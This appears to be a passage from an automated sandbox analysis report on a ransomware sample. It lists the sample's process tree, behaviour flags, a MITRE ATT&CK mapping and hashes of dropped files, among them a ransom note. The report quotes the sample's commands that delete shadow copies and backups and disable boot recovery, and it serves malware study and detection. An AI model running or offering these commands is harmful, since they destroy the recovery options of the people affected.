PID 2364 wrote to memory of 2808	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2424	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2424	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2424	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2424	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2740	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2740	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2740	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2740	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2808 wrote to memory of 2552	2808	cmd.exe	vssadmin.exe
PID 2808 wrote to memory of 2552	2808	cmd.exe	vssadmin.exe
PID 2808 wrote to memory of 2552	2808	cmd.exe	vssadmin.exe
PID 2808 wrote to memory of 2552	2808	cmd.exe	vssadmin.exe
PID 2364 wrote to memory of 2772	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2772	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2772	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2772	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2608	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2608	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2608	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2608	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2672	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2672	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2672	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2364 wrote to memory of 2672	2364	2f2d4eb24662c916f822f9c3fd55c9b2.exe	cmd.exe
PID 2772 wrote to memory of 2692	2772	cmd.exe	WMIC.exe
PID 2772 wrote to memory of 2692	2772	cmd.exe	WMIC.exe
PID 2772 wrote to memory of 2692	2772	cmd.exe	WMIC.exe
PID 2772 wrote to memory of 2692	2772	cmd.exe	WMIC.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2.exe
"C:\Users\Admin\AppData\Local\Temp\2f2d4eb24662c916f822f9c3fd55c9b2.exe"
1⤵
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
  2⤵
  PID:2672
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"
  2⤵
  PID:2608
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2772
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0"
  2⤵
  PID:2740
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"
  2⤵
  PID:2424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2808

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic SHADOWCOPY DELETE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
1⤵
- Interacts with shadow copies
PID:2552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Indicator Removal

2

T1070

File Deletion

Modify Registry

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Network Service Discovery

1

T1046

Peripheral Device Discovery

Query Registry

System Information Discovery

2

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-3627615824-4061627003-3019543961-1000\desktop.ini

Filesize
930B

MD5
29f138787258ee0e5674a096a974f0b4

SHA1
10128b0fc4fa700058eac57507c64519f3d88bd5

SHA256
d5c16309e92125f34dfea9c92bbcd3ebda678a2d47d2cb71b8bc155f2de3a138

SHA512
c34c1935d189c74bf50175e6b353cf2aa0af88727df000552dab6458d4038119143f1f4c6f00c0a802985dfc1f3ad342b147df368b4f0444c0a48e7ba12923cd

Download Submit
C:\$Recycle.Bin\S-1-5-21-3627615824-4061627003-3019543961-1000\how_to_decrypt.hta

Filesize
13KB

MD5
cd4a8374f936473253e26b52f2034052

SHA1
c1f87c822fdea80050309321e9ae0eff6f8045f6

SHA256
07e83520efab44b2f9dd946a9f6f260c2160092896fd33c3230b6db713732970

SHA512
4a0800e5f62e74a8dd9ffa7c5a0f3670360a08eac0b2f2bec4d0ecafc02da0a3342da8ab827a79a79144a7af4612e715fa4679120b1f379af378dd2dbe9f72d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\c-1704318769.log

Filesize
4KB

MD5
5ace3207bc8d4634b193d63e0213bc72

SHA1
2c9197ab29078a250ef8df45b66411c9e8cdce59

SHA256
8db4c530a10003808eabe2da24530ef50747f35549be1f8be9e998e97613efe1

SHA512
119a4da1f6725d615bdcb0a583b46664068ecf0eb6761d15d948b79439d51578c665543359e591ec94fdcbc8ff04cadd8e3455856f9780340ce6d56182c0daa3

Download Submit
memory/2364-2665-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-10-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-1073-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-1867-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-1906-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-1-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-9-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-2693-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-2892-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-2891-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-2890-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-2893-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-2894-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2364-2895-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads